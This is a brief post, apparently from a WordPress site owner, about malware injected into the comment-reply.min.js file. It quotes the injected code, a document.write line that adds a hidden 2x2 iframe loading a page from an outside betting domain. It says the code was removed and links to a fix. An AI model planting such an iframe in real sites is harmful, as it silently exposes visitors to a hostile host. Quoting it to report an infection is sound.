I was facing frequent malware attacks on my wordpress site. Code injection was in this file wp-includes/js/comment-reply.min.js?ver=3.5.1. The code is with different urls like griebwal and many more.
[document.write('<iframe name=Twitter scrolling=auto framebor
der=no align=center height=2 width=2 src=http://168bet.com/c
ocs.html?j=1194757></iframe>');]I removed this successfully and now my site is secure. I write a complete solution at this link.
http://semioffice.com/wordpress/latest-malware-attacks-on-wordpress-sites-and-its-solution/